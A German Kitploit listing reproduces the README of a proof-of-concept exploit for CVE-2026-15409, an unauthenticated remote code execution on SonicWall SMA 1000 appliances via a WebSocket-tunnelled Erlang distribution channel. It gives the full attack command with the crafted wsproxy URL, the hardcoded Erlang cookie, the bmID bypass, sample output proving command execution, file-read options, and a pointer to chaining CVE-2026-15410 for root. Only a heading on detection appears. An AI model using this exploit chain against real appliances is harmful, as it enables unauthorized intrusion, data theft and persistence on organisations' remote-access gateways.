Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-15409 — Proof-of-Concept-Exploit für CVE-2026-15409 (SonicWall SMA 1000 RCE) über Erlang-Distribution per WebSocket. Ermöglicht nicht authentifizierte Remote-Codeausführung als couchdb-Benutzer. | Kitploit
Tools/GitHubGitHub/ch4120n/cve-2026-15409
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationPost-ExploitationPenetrationstestsRed Teaming
GitHubch4120n/cve-2026-15409

CVE-2026-15409

Proof-of-Concept-Exploit für CVE-2026-15409 (SonicWall SMA 1000 RCE) über Erlang-Distribution per WebSocket. Ermöglicht nicht authentifizierte Remote-Codeausführung als couchdb-Benutzer.

Repository anzeigen
112vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2026-15409 – SonicWall SMA 1000 Erlang-RCE über WebSocket-Proxy

Python Exploit CVE

GitHub stars GitHub issues License

Proof‑of‑Concept-Exploit für CVE-2026-15409 – nicht authentifizierte Remote-Codeausführung auf SonicWall-SMA-1000-Geräten über das per WebSocket getunnelte Erlang-Distributionsprotokoll.


📖 Überblick

CVE-2026-15409 ist eine kritische Schwachstelle, die SonicWall-SMA-1000-Geräte betrifft (Versionen vor dem Hotfix vom Juni 2026). Der Fehler liegt im WorkPlace-Dienst (normalerweise über Port 443 erreichbar), der WebSocket-Verbindungen zu internen Erlang-Knoten weiterleitet. Durch das Fälschen eines gültigen bmID-Parameters und die Verwendung eines fest verdrahteten Erlang-Cookies kann ein Angreifer einen authentifizierten Distributionskanal aufbauen und über RPC-Aufrufe an os:cmd/1 beliebige Systembefehle als Benutzer couchdb (oder andere Konten mit niedrigen Rechten) ausführen.

Dieses Repository bietet einen voll funktionsfähigen PoC, der die gesamte Exploit-Kette automatisiert – vom WebSocket-Handshake bis zur Ausführung beliebiger Befehle – mit einer übersichtlichen Schnittstelle, erweiterter Fehlerbehandlung und ansprechender Protokollierung.

🔍 Hauptfunktionen

  • WebSocket-Tunneling – funktioniert direkt über wss:// unter Verwendung des wsproxy-Endpunkts.
  • Erlang-Distributionsprotokoll – implementiert den Handshake und ETF (Erlang External Term Format) vollständig.
  • Remote-Codeausführung – über os:cmd/1; kann Dateien über file:read_file/1 lesen oder die Konnektivität mit erlang:node/0 testen.
  • Intelligente Erkennung – unterstützt beliebige bmID-Werte (solange sie mit -3389 beginnen) und mehrere serviceType-Werte.
  • Umfassende Protokollierung – farbcodierte Meldungen mit Symbolen wie [+], [*], [-], [!] für eine einfache Überwachung.

🧬 Details zur Schwachstelle

Die Schwachstelle resultiert aus den folgenden Designschwächen im SMA 1000:

  1. Uneingeschränktes WebSocket-Proxying – Der /wsproxy-Endpunkt leitet binäre WebSocket-Nachrichten ohne ordnungsgemäße Authentifizierung oder Autorisierung an einen lokalen Erlang-Distributionsport weiter (standardmäßig localhost:1050).
  2. Vorhersehbares/fest verdrahtetes Erlang-Cookie – Das für die Distributionsauthentifizierung verwendete Cookie ist auf allen SMA-Geräten statisch (zumindest in der getesteten Version). Dadurch kann ein externer Angreifer den Handshake abschließen.
  3. Offengelegter Erlang-Knoten – Der Erlang-Knoten [email protected] lauscht auf Port 1050 und akzeptiert Verbindungen vom WebSocket-Proxy, wodurch er aus dem Netzwerk erreichbar ist.
  4. Leistungsstarke RPC-Schnittstelle – Der Erlang-Knoten bietet den Standarddienst rex, der beliebige Funktionen auf dem Knoten ausführen kann, einschließlich os:cmd/1.

Betroffene Versionen

  • SonicWall-SMA-1000-Serie mit Firmware vor dem Hotfix vom Juni 2026 (z. B. ex_sra_vm_12.5.0-02002.ova).
  • Der WorkPlace-Dienst muss aktiviert sein (Standardkonfiguration).

Auswirkungen

  • Remote-Codeausführung als Benutzer couchdb (UID 1010, Gruppe daemon).
  • Laterale Bewegung – ein Angreifer kann CVE-2026-15410 (XML‑RPC-Pfadtraversierung) ausnutzen, um Privilegien auf Root zu erweitern.
  • Datenexfiltration – beliebige Dateien über file:read_file/1 lesen.
  • Persistenz – Hintertüren installieren oder Systemdateien modifizieren.

🔧 Voraussetzungen für die Ausnutzung

  • Netzwerkzugriff auf den WorkPlace-Dienst des SMA-Geräts (normalerweise TCP/443).
  • Keine gültigen Anmeldedaten erforderlich – der Exploit funktioniert ohne Authentifizierung.
  • Python 3.8+ mit der Bibliothek websockets (Installation über pip install websockets).

🚀 Verwendung

Installation

git clone https://github.com/Ch4120N/CVE-2026-15409.git
cd CVE-2026-15409
pip install -r requirements.txt   # websockets

Grundlegender Befehl

python3 cve-2026-15409.py \
  --ws-url 'wss://TARGET_IP/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' \
  --ws-user-agent 'SMA Connect Agent' \
  --ws-insecure-tls \
  --exec 'whoami && id && pwd && hostname'

Beispielausgabe

  ░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▄▀▀░░░░░▀█░░█▀▀░█░█░▄▀▄░▄▀▄
  ░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░█▀▄░▄▄▄░░█░░▀▀▄░░▀█░█/█░░▀█
  ░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░░▀░░░░░░▀▀▀░▀▀░░░░▀░░▀░░▀▀░
                    [CVE-2026-15409]
         Erlang Distribution RCE via WebSocket Proxy
                     Owner: Ch4120N

[ * ] Connecting via WebSocket to wss://192.168.56.102/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050
[ * ] Preparing RPC: os:cmd('whoami && id && pwd && hostname')
[ + ] Authenticated to [email protected]
[ * ] Calling os:cmd/1 ...
[ + ] RPC call completed
[ * ] Peer name: [email protected]
[ * ] Peer flags: 0xd07df7fbd
[ * ] Peer creation: 1784069352
[ + ] Command output:
couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

Erweiterte Optionen

ArgumentBeschreibung
--host, --portTCP-Fallback (falls kein WebSocket verwendet wird)
--cookieDas standardmäßige fest verdrahtete Cookie überschreiben
--nameBenutzerdefinierter Name des lokalen Erlang-Knotens
--ws-originOrigin-Header für WebSocket festlegen
--ws-user-agentUser-Agent-Zeichenkette (Standard: SMA Connect Agent)
--ws-insecure-tlsTLS-Überprüfung deaktivieren (selbstsignierte Zertifikate)
--read-fileEine Datei vom Ziel lesen (z. B. /etc/passwd)
--rpcNur die Verbindung testen, indem erlang:node/0 aufgerufen wird

🧪 Technische Details für Erkennung & Feinabstimmung

Fest verdrahtetes Cookie

Das im Exploit verwendete Erlang-Cookie lautet:

10ecad5b446e86864832904cd439b6b70262

Dieser Wert ist auf allen getesteten SMA-Geräten identisch und im Erlang-Prozess auf localhost:1050 fest verdrahtet. Er ist nicht dasselbe wie das benutzerkonfigurierte Cookie für das Clustering.

Der bmID-Parameter

Der bmID-Parameter muss mit -3389 beginnen (z. B. -3389c1b25ccd). Beliebige Werte nach dem Präfix werden akzeptiert, daher sollte eine signaturbasierte Erkennung nicht auf einem festen Hash basieren.

Diensttypen

Während das Beispiel serviceType=SSH verwendet, funktionieren auch andere Werte wie TELNET. Der Exploit ist unabhängig vom Diensttyp.

Portauswahl

Port 1050 ist der standardmäßige interne Port, aber es wurden auch Angriffe in freier Wildbahn beobachtet, die auf Port 8188 abzielen. Der Exploit kann an jeden Port angepasst werden, der das Erlang-Distributionsprotokoll bereitstellt.

Privilegienerweiterung

Nachdem eine Shell als couchdb erlangt wurde, kann ein Angreifer CVE-2026-15410 ausnutzen – eine XML‑RPC-Pfadtraversierung, die das Entfernen des Hotfixes und eine anschließende Privilegienerweiterung auf Root ermöglicht.


🛡️ Erkennung & Eindämmung

Tool herunterladen